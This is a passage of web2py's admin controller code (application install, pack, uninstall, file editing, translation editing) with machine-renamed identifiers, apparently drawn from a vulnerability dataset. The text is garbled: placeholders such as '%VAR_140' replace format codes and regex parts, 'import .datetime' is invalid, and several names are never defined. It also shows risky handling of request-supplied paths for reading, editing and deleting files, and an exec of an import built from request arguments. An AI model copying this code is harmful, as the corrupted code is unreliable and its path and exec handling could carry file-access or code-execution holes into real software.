VAR_30 = SQLFORM.factory(Field('name', requires=VAR_29),
table_name='appcreate')
VAR_31 = SQLFORM.factory(Field('name', requires=VAR_29),
Field('file', 'upload', uploadfield=False),
Field('url'),
Field('overwrite', 'boolean'),
table_name='appupdate')
VAR_30.process()
VAR_31.process()
if DEMO_MODE:
pass
elif VAR_30.accepted:
VAR_174 = cleanpath(VAR_30.vars.name)
VAR_175, VAR_125 = app_create(VAR_174, request, info=True)
if VAR_175:
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T('new application "%s" created', VAR_174)
gluon.rewrite.load()
redirect(URL('design', VAR_98=VAR_174))
else:
session.flash = \
DIV(T('unable to create application "%s"', VAR_174),
PRE(VAR_125))
redirect(URL(VAR_122=request))
elif VAR_31.accepted:
if (VAR_31.vars.url or '').endswith('.git'):
if not VAR_19:
session.flash = VAR_117
redirect(URL(VAR_122=request))
VAR_211 = os.path.join(apath(VAR_122=request), VAR_31.vars.name)
try:
VAR_217 = git.Repo.clone_from(VAR_31.vars.url, VAR_211)
session.flash = T('new application "%s" imported',
VAR_31.vars.name)
gluon.rewrite.load()
except git.GitCommandError as err:
session.flash = T('Invalid git repository specified.')
redirect(URL(VAR_122=request))
elif VAR_31.vars.url:
try:
VAR_221 = urlopen(VAR_31.vars.url)
if VAR_221.code == 404:
raise Exception("404 VAR_16 not found")
except Exception as VAR_114:
session.flash = \
DIV(T('Unable to download VAR_3 because:'), PRE(repr(VAR_114)))
redirect(URL(VAR_122=request))
VAR_120 = VAR_31.vars.url
elif VAR_31.accepted and VAR_31.vars.file:
VAR_120 = request.vars.file.filename
VAR_221 = request.vars.file.file
else:
session.flash = 'No VAR_16 uploaded and no URL specified'
redirect(URL(VAR_122=request))
if VAR_221:
VAR_174 = cleanpath(VAR_31.vars.name)
VAR_212 = app_install(VAR_174, VAR_221,
request, VAR_120,
overwrite=VAR_31.vars.overwrite)
if VAR_221 and VAR_212:
VAR_155 = 'application %(VAR_174)VAR_140 VAR_212 with md5sum: %(digest)s'
if MULTI_USER_MODE:
db.app.insert(VAR_10=VAR_174, owner=auth.user.id)
FUNC_1(VAR_174)
session.flash = T(VAR_155, dict(VAR_174=appname,
digest=md5_hash(VAR_212)))
gluon.rewrite.load()
else:
VAR_155 = 'unable to install application "%(VAR_174)s"'
session.flash = T(VAR_155, dict(VAR_174=VAR_31.vars.name))
redirect(URL(VAR_122=request))
VAR_32 = re.compile('^\w+$')
if is_manager():
VAR_33 = [VAR_7 for VAR_7 in os.listdir(apath(VAR_122=request)) if VAR_32.match(VAR_7) and
VAR_7 != '__pycache__']
else:
VAR_33 = [VAR_7.name for VAR_7 in db(db.app.owner == auth.user_id).select()]
if FILTER_APPS:
VAR_33 = [VAR_7 for VAR_7 in VAR_33 if VAR_7 in FILTER_APPS]
VAR_33 = sorted(VAR_33, VAR_143=lambda VAR_7: a.upper())
VAR_34 = platform.python_version()
return dict(VAR_3=None, VAR_33=apps, VAR_27=myversion, VAR_34=myplatform,
VAR_30=form_create, VAR_31=form_update)
def FUNC_11(VAR_3):
import .datetime
VAR_20 = os.path.join(apath(VAR_3, VAR_122=request), 'progress.log')
VAR_32 = re.compile('\[(.*?)\][^\:]+\:\VAR_140+(\-?\VAR_68+)')
if not os.path.exists(VAR_20):
return []
VAR_35 = VAR_32.findall(open(VAR_20, 'r').read())
VAR_36, VAR_37 = [], 0
for VAR_156 in VAR_35:
if not VAR_156:
continue
VAR_118 = -(request.now - datetime.datetime.strptime(VAR_156[0],
'%Y-%VAR_156-%VAR_68 %H:%M:%S')).days
VAR_37 += int(VAR_156[1])
VAR_36.append([VAR_118, VAR_37])
return VAR_36
def FUNC_12():
VAR_3 = FUNC_5()
try:
if len(request.args) == 1:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
VAR_5 = app_pack(VAR_3, request, raise_ex=True)
else:
VAR_120 = 'web2py.app.%VAR_140.compiled.w2p' % VAR_3
VAR_5 = app_pack_compiled(VAR_3, request, raise_ex=True)
except Exception as VAR_114:
VAR_176 = VAR_114
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_176)
redirect(URL('site'))
def FUNC_13():
VAR_3 = FUNC_5()
if len(request.args) == 2:
VAR_120 = 'web2py.plugin.%VAR_140.w2p' % request.args[1]
VAR_5 = plugin_pack(VAR_3, request.args[1], request)
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal error')
redirect(URL('plugin', VAR_98=request.args))
def FUNC_14(VAR_3, VAR_11, VAR_12=None):
import .urllib
import .zipfile
VAR_38 = 'http://www.web2py.com/examples/static/VAR_40.zip'
VAR_39 = StringIO()
VAR_39.write(urlopen(VAR_38).read())
VAR_40 = zipfile.ZipFile(VAR_39, VAR_4='a')
VAR_41 = u'# -*- coding: utf-8 -*-\nrouters = dict(BASE=dict(default_application="%s"))' % VAR_3
VAR_40.writestr('web2py/VAR_41.py', VAR_41.encode('utf-8'))
VAR_42 = os.path.dirname(VAR_11)
for VAR_5 in VAR_12:
VAR_120 = os.path.join(VAR_11, VAR_5)
VAR_121 = os.path.join('web2py/applications', VAR_3, VAR_5)
VAR_40.write(VAR_120, VAR_121)
VAR_40.close()
VAR_43.headers['Content-Type'] = 'application/zip'
VAR_43.headers['Content-Disposition'] = 'attachment; VAR_5=web2py.app.%VAR_140.zip' % VAR_3
VAR_39.seek(0)
return VAR_43.stream(VAR_39)
def FUNC_15():
VAR_3 = FUNC_5()
VAR_11 = apath(VAR_3, VAR_122=request)
def FUNC_58(VAR_44):
return [VAR_221 for VAR_221 in VAR_44 if not (
VAR_221[:1] in '#' or VAR_221.endswith('~') or VAR_221.endswith('.bak'))]
VAR_45 = {}
for (VAR_122, VAR_68, VAR_221) in os.walk(VAR_11):
VAR_45[VAR_122] = {'folders': FUNC_58(VAR_68), 'files': FUNC_58(VAR_221)}
if request.post_vars.file:
VAR_123 = set(os.path.relpath(os.path.join(VAR_122, VAR_221), VAR_11) for VAR_122 in VAR_45 for VAR_221 in VAR_45[VAR_122]['files'])
VAR_45 = request.post_vars.file
VAR_45 = [files] if not isinstance(VAR_45, list) else VAR_45
VAR_45 = [VAR_16 for VAR_16 in VAR_45 if VAR_16 in VAR_123]
if request.post_vars.doexe is None:
VAR_120 = 'web2py.app.%VAR_140.w2p' % VAR_3
try:
VAR_5 = app_pack(VAR_3, request, raise_ex=True, VAR_12=VAR_45)
except Exception as VAR_114:
VAR_5 = None
if VAR_5:
VAR_43.headers['Content-Type'] = 'application/w2p'
VAR_119 = 'attachment; VAR_5=%s' % VAR_120
VAR_43.headers['Content-Disposition'] = VAR_119
return FUNC_3(VAR_5, 'rb')
else:
session.flash = T('internal VAR_125: %s', VAR_114)
redirect(URL(VAR_98=request.args))
else:
return FUNC_14(VAR_3, VAR_11, VAR_45)
return locals()
def FUNC_16():
VAR_46 = FORM.confirm(T('Upgrade'),
{T('Cancel'): URL('site')})
if VAR_46.accepted:
(VAR_124, VAR_125) = upgrade(request)
if VAR_124:
session.flash = T('web2py upgraded; please restart it')
else:
session.flash = T('unable to upgrade because "%s"', VAR_125)
redirect(URL('site'))
return dict(VAR_46=dialog)
def FUNC_17():
VAR_3 = FUNC_5()
VAR_46 = FORM.confirm(T('Uninstall'),
{T('Cancel'): URL('site')})
VAR_46['_id'] = 'confirm_form'
VAR_46['_class'] = 'well'
for VAR_126 in VAR_46.components:
VAR_126['_class'] = 'btn'
if VAR_46.accepted:
if MULTI_USER_MODE:
if is_manager() and db(db.app.name == VAR_3).delete():
pass
elif db(db.app.name == VAR_3)(db.app.owner == auth.user.id).delete():
pass
else:
session.flash = T('no permission to FUNC_17 "%s"', VAR_3)
redirect(URL('site'))
try:
VAR_5 = app_pack(VAR_3, request, raise_ex=True)
except:
session.flash = T('unable to FUNC_17 "%s"', VAR_3)
else:
if app_uninstall(VAR_3, request):
session.flash = T('application "%s" uninstalled', VAR_3)
else:
session.flash = T('unable to FUNC_17 "%s"', VAR_3)
redirect(URL('site'))
return dict(VAR_3=VAR_3, VAR_46=dialog)
def FUNC_18():
VAR_3 = FUNC_5()
VAR_47 = app_cleanup(VAR_3, request)
if not VAR_47:
session.flash = T("some VAR_45 could not be removed")
else:
session.flash = T('cache, FUNC_42 and sessions cleaned')
redirect(URL('site'))
def FUNC_19():
VAR_3 = FUNC_5()
VAR_48 = app_compile(VAR_3, request,
skip_failed_views=(request.args(1) == 'skip_failed_views'))
if not VAR_48:
session.flash = T('application compiled')
elif isinstance(VAR_48, list):
session.flash = DIV(*[T('application compiled'), BR(), BR(),
T('WARNING: The following VAR_84 could not be compiled:'), BR()] +
[CAT(BR(), VAR_182) for VAR_182 in VAR_48] +
[BR(), BR(), T('DO NOT use the "Pack compiled" feature.')])
else:
session.flash = DIV(T('Cannot compile: there are FUNC_42 in your VAR_3:'),
CODE(VAR_48))
redirect(URL('site'))
def FUNC_20():
VAR_3 = FUNC_5()
remove_compiled_application(apath(VAR_3, VAR_122=request))
session.flash = T('compiled application removed')
redirect(URL('site'))
def FUNC_21():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
VAR_49 = request.vars.sender
if isinstance(VAR_49, list): # ## fix VAR_7 problem with Vista
VAR_49 = sender[0]
VAR_46 = FORM.confirm(T('Delete'),
{T('Cancel'): URL(VAR_49, VAR_157=request.vars.id)})
if VAR_46.accepted:
try:
VAR_177 = apath(VAR_5, VAR_122=request)
VAR_160 = FUNC_0(open(VAR_177, 'r').read())
os.unlink(VAR_177)
FUNC_1(VAR_3, 'DELETE', VAR_5, VAR_6=-VAR_160)
session.flash = T('file "%(VAR_5)s" deleted',
dict(VAR_5=filename))
except Exception:
session.flash = T('unable to FUNC_21 VAR_16 "%(VAR_5)s"',
dict(VAR_5=filename))
redirect(URL(VAR_49, VAR_157=request.vars.id2))
return dict(VAR_46=dialog, VAR_5=filename)
def FUNC_22():
if not URL.verify(request, hmac_key=session.hmac_key): raise HTTP(401)
VAR_3 = FUNC_5()
VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), 'DISABLED')
if is_gae:
return SPAN(T('Not supported'), _style='color:yellow')
elif os.path.exists(VAR_5):
os.unlink(VAR_5)
return SPAN(T('Disable'), _style='color:green')
else:
if PY2:
FUNC_2(VAR_5, 'wb').write('disabled: True\ntime-disabled: %s' % request.now)
else:
VAR_200 = 'disabled: True\ntime-disabled: %s' % request.now
FUNC_2(VAR_5, 'wb').write(VAR_200.encode('utf-8'))
return SPAN(T('Enable'), _style='color:red')
def FUNC_23():
VAR_3 = FUNC_5(request.vars.app)
VAR_5 = '/'.join(request.args)
if request.vars.app:
VAR_15 = abspath(VAR_5)
else:
VAR_15 = apath(VAR_5, VAR_122=request)
try:
VAR_2 = FUNC_3(VAR_15).replace('\r', '')
except IOError:
session.flash = T('file does not exist')
redirect(URL('site'))
VAR_50 = VAR_5[filename.rfind('.') + 1:].lower()
return dict(VAR_3=app,
VAR_5=filename,
VAR_2=data,
VAR_50=extension)
def FUNC_24():
VAR_3 = FUNC_5()
if len(request.args) > 1:
VAR_16 = request.args[1]
else:
VAR_16 = '.*\.py'
VAR_51 = listdir(
apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), VAR_16 + '$')
return dict(VAR_3=VAR_3, VAR_51=controllers)
def FUNC_25():
return ''
def FUNC_26():
VAR_52 = request.vars.keywords or ''
VAR_3 = FUNC_5()
def FUNC_59(VAR_5, VAR_52):
VAR_5 = os.path.join(apath(VAR_3, VAR_122=request), VAR_5)
if VAR_52 in read_file(VAR_5, 'r'):
return True
return False
VAR_15 = apath(request.args[0], VAR_122=request)
VAR_53 = glob(os.path.join(VAR_15, '*/*.py'))
VAR_54 = glob(os.path.join(VAR_15, '*/*.html'))
VAR_55 = glob(os.path.join(VAR_15, '*/*/*.html'))
VAR_45 = [x[len(VAR_15) + 1:].replace(
'\\', '/') for x in VAR_53 + VAR_54 + VAR_55 if FUNC_59(x, VAR_52)]
return VAR_43.json(dict(VAR_45=files, message=T.M('Searching: **%VAR_140** %%{VAR_16}', len(VAR_45))))
def FUNC_27():
VAR_3 = FUNC_5(request.vars.app)
VAR_56 = apath(VAR_3, VAR_122=request)
VAR_57 = {'theme': 'web2py', 'editor': 'default', 'closetag': 'true', 'codefolding': 'false', 'tabwidth': '4', 'indentwithtabs': 'false', 'linenumbers': 'true', 'highlightline': 'true'}
VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor', default_values={})
VAR_57.update(VAR_58.read())
if not(request.ajax) and not(is_mobile):
VAR_43.title = T('Editing %s') % VAR_3
return VAR_43.render('default/FUNC_27.html', dict(VAR_3=VAR_3, editor_settings=VAR_57))
if 'settings' in request.vars:
if request.post_vars: # save new VAR_57
if PY2:
VAR_201 = request.post_vars.items()
else:
VAR_201 = list(request.post_vars.items())
VAR_201 += [(opt, 'false') for opt in VAR_57 if opt not in request.post_vars]
if VAR_58.save(VAR_201):
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved correctly')
else:
VAR_43.headers["web2py-VAR_126-flash"] = T('Preferences saved on session only')
VAR_43.headers["web2py-VAR_126-command"] = "update_editor(%VAR_140);$('a[href=#editor_settings] button.close').click();" % VAR_43.json(VAR_58.read())
return
else:
VAR_178 = {'realfilename': 'settings', 'filename': 'settings', 'id': 'editor_settings', 'force': False}
VAR_178['plain_html'] = VAR_43.render('default/editor_settings.html', {'editor_settings': VAR_57})
return VAR_43.json(VAR_178)
""" File FUNC_27 handler """
VAR_3 = FUNC_5(request.vars.app)
VAR_5 = '/'.join(request.args)
VAR_59 = request.args[-1]
if request.vars.app:
VAR_15 = abspath(VAR_5)
else:
VAR_15 = apath(VAR_5, VAR_122=request)
if VAR_5[-3:] == '.py':
VAR_127 = 'python'
elif VAR_5[-5:] == '.html':
VAR_127 = 'html'
elif VAR_5[-5:] == '.load':
VAR_127 = 'html'
elif VAR_5[-4:] == '.css':
VAR_127 = 'css'
elif VAR_5[-3:] == '.js':
VAR_127 = 'javascript'
else:
VAR_127 = 'html'
if ('revert' in request.vars) and os.path.exists(VAR_15 + '.bak'):
try:
VAR_2 = FUNC_3(VAR_15 + '.bak')
VAR_179 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
FUNC_4(VAR_15, VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
FUNC_4(VAR_15 + '.bak', VAR_179)
VAR_43.flash = T('file "%s" of %VAR_140 restored', (VAR_5, VAR_129))
else:
try:
VAR_2 = FUNC_3(VAR_15)
except IOError:
session.flash = T('Invalid action')
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('Invalid action'))})
else:
redirect(URL('site'))
VAR_130 = FUNC_0(VAR_2)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
if request.vars.file_hash and request.vars.file_hash != VAR_128:
session.flash = T('file changed on disk')
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15 + '.1', VAR_2)
if 'from_ajax' in request.vars:
return VAR_43.json({'error': str(T('file changed on disk')),
'redirect': URL('resolve',
VAR_98=request.args)})
else:
redirect(URL('resolve', VAR_98=request.args))
elif request.vars.data:
FUNC_4(VAR_15 + '.bak', VAR_2)
VAR_2 = request.vars.data.replace('\VAR_122\n', '\n').strip() + '\n'
FUNC_4(VAR_15, VAR_2)
VAR_202 = FUNC_0(VAR_2)
FUNC_1(
VAR_3, 'EDIT', VAR_5, VAR_6=VAR_202 - VAR_130)
VAR_128 = md5_hash(VAR_2)
VAR_129 = time.ctime(os.stat(VAR_15)[stat.ST_MTIME])
VAR_43.flash = T('file saved on %s', VAR_129)
VAR_60 = (request.vars.data or request.vars.revert)
VAR_61 = None
if VAR_127 == 'python' and request.vars.data:
import _ast
try:
VAR_180 = request.vars.data.rstrip().replace('\VAR_122\n', '\n') + '\n'
compile(VAR_180, VAR_15, "exec", _ast.PyCF_ONLY_AST)
except Exception as VAR_114:
VAR_203 = sum([len(VAR_69) + 1 for l, VAR_69
in enumerate(request.vars.data.split("\n"))
if l < VAR_114.lineno - 1])
if VAR_114.text and VAR_114.offset:
VAR_213 = VAR_114.offset - (len(VAR_114.text) - len(
VAR_114.text.splitlines()[-1]))
else:
VAR_213 = 0
VAR_61 = {'start': VAR_203, 'end': VAR_203 +
VAR_213 + 1, 'lineno': VAR_114.lineno, 'offset': VAR_213}
try:
VAR_214 = VAR_114.__class__.__name__
except:
VAR_214 = 'unknown exception!'
VAR_43.flash = DIV(T('failed to compile VAR_16 because:'), BR(),
B(VAR_214), ' ' + T('at VAR_69 %s', VAR_114.lineno),
VAR_213 and ' ' +
T('at char %s', VAR_213) or '',
PRE(repr(VAR_114)))
if VAR_60 and request.args[1] == 'modules':
try:
VAR_181 = '.'.join(request.args[2:])[:-3]
exec('import .applications.%VAR_140.modules.%s' % (
request.args[0], VAR_181))
reload(sys.modules['applications.%VAR_140.modules.%s'
% (request.args[0], VAR_181)])
except Exception as VAR_114:
VAR_43.flash = DIV(
T('failed to reload module because:'), PRE(repr(VAR_114)))
VAR_62 = None
VAR_63 = None
VAR_64 = None
if VAR_127 == 'html' and len(request.args) >= 3:
VAR_131 = os.path.join(request.args[0], 'controllers',
request.args[2] + '.py')
if os.path.exists(apath(VAR_131, VAR_122=request)):
VAR_62 = URL('edit', VAR_98=[VAR_131.replace(os.sep, "/")])
VAR_182 = request.args[3].replace('.html', '')
VAR_64 = URL(request.args[0], request.args[2], VAR_182)
elif VAR_127 == 'python' and request.args[1] == 'controllers':
VAR_3 = FUNC_5()
VAR_183 = os.path.splitext(request.args[2])[0]
VAR_184 = os.path.join(VAR_3, 'views', VAR_183)
VAR_185 = apath(VAR_184, VAR_122=request)
VAR_186 = []
if os.path.exists(VAR_185):
if os.path.isdir(VAR_185):
VAR_186 = glob(os.path.join(VAR_185, '*.html'))
elif os.path.exists(VAR_185 + '.html'):
VAR_186.append(VAR_185 + '.html')
if len(VAR_186):
VAR_63 = []
for v in sorted(VAR_186):
VAR_215 = os.path.split(v)[-1]
VAR_216 = "/".join([VAR_184.replace(os.sep, "/"), VAR_215])
VAR_63.append(A(VAR_215.split(".")[0],
VAR_144="editor_filelink",
_href=URL('edit', VAR_98=[VAR_216])))
if len(request.args) > 2 and request.args[1] == 'controllers':
VAR_132 = (request.args[2])[:-3]
try:
VAR_83 = find_exposed_functions(VAR_2)
VAR_83 = functions and sorted(VAR_83) or []
except SyntaxError as err:
VAR_83 = ['SyntaxError:Line:%d' % err.lineno]
else:
(VAR_132, VAR_83) = (None, None)
if 'from_ajax' in request.vars:
return VAR_43.json({'file_hash': VAR_128, 'saved_on': VAR_129, 'functions': VAR_83, 'controller': VAR_132, 'application': request.args[0], 'highlight': VAR_61})
else:
VAR_133 = dict(VAR_3=request.args[0],
VAR_160=request.vars.lineno or 1,
editor_settings=VAR_57,
VAR_5=filename,
VAR_59=realfilename,
VAR_127=filetype,
VAR_2=data,
VAR_62=edit_controller,
VAR_128=file_hash,
VAR_129=saved_on,
VAR_132=controller,
VAR_83=functions,
VAR_64=view_link,
VAR_63=editviewlinks,
id=IS_SLUG()(VAR_5)[0],
force=True if (request.vars.restore or
request.vars.revert) else False)
VAR_134 = VAR_43.render('default/edit_js.html', VAR_133)
file_details['plain_html'] = VAR_134
if is_mobile:
return VAR_43.render('default.mobile/FUNC_27.html',
VAR_133, editor_settings=VAR_57)
else:
return VAR_43.json(VAR_133)
def FUNC_28():
VAR_3 = request.vars.app or ''
VAR_56 = apath('%(VAR_3)s' % {'app': VAR_3}, VAR_122=request)
VAR_65 = ['models', 'controllers', 'modules', 'private']
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
VAR_45 = sorted(listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
VAR_45 = [x.replace(os.path.sep, '/') for x in VAR_45 if not x.endswith('.bak')]
return VAR_45
VAR_66 = '#\VAR_140*(todo)+\VAR_140+(.*)'
VAR_32 = re.compile(VAR_66, re.IGNORECASE)
VAR_67 = []
for VAR_68 in VAR_65:
for VAR_221 in FUNC_38(VAR_3, VAR_68):
VAR_35 = []
VAR_5 = apath(os.path.join(VAR_3, VAR_68, VAR_221), VAR_122=request)
with FUNC_2(VAR_5, 'r') as f_s:
VAR_204 = f_s.read()
for VAR_156 in VAR_32.finditer(VAR_204):
VAR_203 = VAR_156.start()
VAR_160 = VAR_204.count('\n', 0, VAR_203) + 1
VAR_35.append({'text': VAR_156.group(0), 'lineno': VAR_160})
if len(VAR_35) != 0:
VAR_67.append({'filename': VAR_221, 'matches': VAR_35, 'dir': VAR_68})
return {'todo': VAR_67, 'app': VAR_3}
def FUNC_29():
VAR_58 = Config(os.path.join(request.folder, 'settings.cfg'),
section='editor_sessions', default_values={})
VAR_57 = VAR_58.read()
if request.vars.session_name and request.vars.files:
VAR_135 = request.vars.session_name
VAR_45 = request.vars.files
VAR_57.update({VAR_135: ','.join(VAR_45)})
if VAR_58.save(VAR_57.items()):
VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved correctly')
else:
VAR_43.headers["web2py-VAR_126-flash"] = T('Session saved on session only')
return VAR_43.render('default/FUNC_29.html', {'editor_sessions': VAR_57})
def FUNC_30():
VAR_5 = '/'.join(request.args)
VAR_15 = apath(VAR_5, VAR_122=request)
VAR_7 = FUNC_3(VAR_15).split('\n')
try:
VAR_8 = FUNC_3(VAR_15 + '.1').split('\n')
except IOError:
session.flash = 'Other VAR_16, no longer there'
redirect(URL('edit', VAR_98=request.args))
VAR_68 = difflib.ndiff(VAR_7, VAR_8)
def FUNC_60(VAR_69):
VAR_136 = ''
for (VAR_145, VAR_48) in enumerate(VAR_69):
if VAR_48 == ' ':
VAR_136 += ' '
elif VAR_48 == ' \t':
VAR_136 += ' '
elif VAR_145 == 0 and VAR_48 == '?':
pass
else:
break
return XML(VAR_136)
def FUNC_61(VAR_70):
VAR_137 = {' ': 'normal', '+': 'plus', '-': 'minus'}
return VAR_137[VAR_70[0]]
if request.vars:
VAR_48 = '\n'.join([VAR_70[2:].rstrip() for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0]
== ' ' or 'line%i' % VAR_111 in request.vars])
FUNC_4(VAR_15, VAR_48)
session.flash = 'files merged'
redirect(URL('edit', VAR_98=request.args))
else:
VAR_138 = lambda VAR_197, VAR_70: not VAR_70[:1] in ['+', '-'] and "" \
or INPUT(_type='checkbox',
_name='line%i' % VAR_197,
VAR_9=VAR_70[0] == '+')
VAR_139 = TABLE(*[TR(TD(VAR_138(VAR_111, VAR_70)),
TD(VAR_70[0]),
TD(FUNC_60(VAR_70[2:]),
TT(VAR_70[2:].rstrip())),
VAR_144=FUNC_61(VAR_70))
for (VAR_111, VAR_70) in enumerate(VAR_68) if VAR_70[0] != '?'])
return dict(VAR_139=diff, VAR_5=filename)
def FUNC_31():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
VAR_43.title = request.args[-1]
VAR_71 = read_dict(apath(VAR_5, VAR_122=request))
if '__corrupted__' in VAR_71:
VAR_26 = SPAN(VAR_71['__corrupted__'], VAR_144='error')
return dict(VAR_5=filename, VAR_26=form)
VAR_72 = sorted(VAR_71.keys(), VAR_143=lambda x: to_native(x).lower())
VAR_73 = []
rows.append(H2(T('Original/Translation')))
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
VAR_140 = VAR_71[VAR_143]
(VAR_141, VAR_142, VAR_143) = key.partition('\x01')
if VAR_142:
VAR_141 = SPAN(VAR_141 + ': ', VAR_144='tm_ftag')
VAR_145 = VAR_143
else:
(VAR_145, VAR_141) = (VAR_141, '')
VAR_144 = 'untranslated' if VAR_145 == VAR_140 else 'translated'
if len(VAR_140) <= 40:
VAR_187 = INPUT(_type='text', _name=VAR_10, VAR_9=VAR_140,
_size=70, VAR_144=_class)
else:
VAR_187 = TEXTAREA(_name=VAR_10, VAR_9=VAR_140, _cols=70,
_rows=5, VAR_144=_class)
VAR_145 = (VAR_140 != VAR_145) and VAR_145 or B(VAR_145)
VAR_146 = DIV(LABEL(VAR_141, VAR_145, _style="font-weight:normal;"),
CAT(VAR_187, '\n', TAG.BUTTON(
T('delete'),
_onclick='return delkey("%s")' % VAR_10,
VAR_144='btn')), _id=VAR_10, VAR_144='span6 well well-small')
VAR_73.append(DIV(VAR_146, VAR_144="row-fluid"))
VAR_73.append(DIV(INPUT(_type='submit', _value=T('update'), VAR_144="btn btn-primary"), VAR_144='controls'))
VAR_26 = FORM(*VAR_73)
if VAR_26.accepts(request.vars, keepvalues=True):
VAR_147 = dict()
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
if VAR_26.vars[VAR_10] == chr(127):
continue
VAR_147[VAR_143] = VAR_26.vars[VAR_10]
write_dict(apath(VAR_5, VAR_122=request), VAR_147)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(VAR_122=request, VAR_98=request.args))
return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def FUNC_32():
VAR_3 = FUNC_5()
VAR_5 = '/'.join(request.args)
VAR_74 = read_plural_dict(
apath(VAR_5, VAR_122=request)) # plural VAR_148 dictionary
VAR_75 = int(request.vars.nplurals) - 1 # plural VAR_148 quantity
VAR_76 = xrange(VAR_75)
if '__corrupted__' in VAR_74:
VAR_26 = SPAN(VAR_74['__corrupted__'], VAR_144='error')
return dict(VAR_5=filename, VAR_26=form)
VAR_72 = sorted(VAR_74.keys(), lambda x, y: cmp(
unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
VAR_77 = []
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
VAR_148 = VAR_74[VAR_143]
if len(VAR_148) < VAR_75:
VAR_148.extend(None for VAR_111 in xrange(VAR_75 - len(VAR_148)))
VAR_149 = DIV(CAT(LABEL(T("Singular Form")), B(VAR_143,
VAR_144='fake-input')))
VAR_150 = [SPAN(LABEL(T("Plural Form #%s", VAR_173 + 1)), INPUT(_type='text', _name=VAR_10 + '_' + str(VAR_173), VAR_9=VAR_148[VAR_173], _size=20), VAR_144='span6') for VAR_173 in VAR_76]
VAR_151 = DIV(CAT(*VAR_150))
VAR_152 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % VAR_10, VAR_144='btn'), VAR_144='span6'))
VAR_153 = DIV(DIV(VAR_149, '\n', VAR_151, '\n', VAR_152, VAR_144='well well-small'), _id=VAR_10, VAR_144='row-fluid tab_row')
VAR_77.append(VAR_153)
VAR_77.append(DIV(TAG['button'](T('update'), _type='submit',
VAR_144='btn btn-primary'),
VAR_144='controls'))
VAR_78 = DIV(*VAR_77, **dict(VAR_144="row-fluid"))
VAR_26 = FORM(VAR_78)
if VAR_26.accepts(request.vars, keepvalues=True):
VAR_154 = dict()
for VAR_143 in VAR_72:
VAR_10 = md5_hash(VAR_143)
if VAR_26.vars[VAR_10 + '_0'] == chr(127):
continue
VAR_154[VAR_143] = [VAR_26.vars[VAR_10 + '_' + str(VAR_173)]
for VAR_173 in VAR_76]
write_plural_dict(apath(VAR_5, VAR_122=request), VAR_154)
session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
redirect(URL(VAR_122=request, VAR_98=request.args, VAR_17=dict(
VAR_75=request.vars.nplurals)))
return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def VAR_79():
VAR_3 = FUNC_5()
VAR_79 = FUNC_3(apath('%VAR_140/ABOUT' % VAR_3, VAR_122=request))
VAR_80 = FUNC_3(apath('%VAR_140/LICENSE' % VAR_3, VAR_122=request))
return dict(VAR_3=VAR_3, VAR_79=MARKMIN(VAR_79), VAR_80=MARKMIN(VAR_80), VAR_6=FUNC_11(VAR_3))
def FUNC_34():
VAR_3 = FUNC_5()
if not VAR_43.flash and VAR_3 == request.application:
VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
VAR_43.flash = VAR_155
if request.vars and not request.vars.token == session.token:
redirect(URL('logout'))
if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
VAR_5 = os.path.basename(request.vars.pluginfile.filename)
if plugin_install(VAR_3, request.vars.pluginfile.file,
request, VAR_5):
session.flash = T('new VAR_96 installed')
redirect(URL('design', VAR_98=VAR_3))
else:
session.flash = \
T('unable to install VAR_96 "%s"', VAR_5)
redirect(URL(VAR_122=request, VAR_98=VAR_3))
elif isinstance(request.vars.pluginfile, str):
session.flash = T('plugin not specified')
redirect(URL(VAR_122=request, VAR_98=VAR_3))
if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
session.flash = \
T('application is compiled and cannot be designed')
redirect(URL('site'))
models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
VAR_81 = [x.replace('\\', '/') for x in VAR_81]
VAR_82 = {}
for VAR_156 in VAR_81:
VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
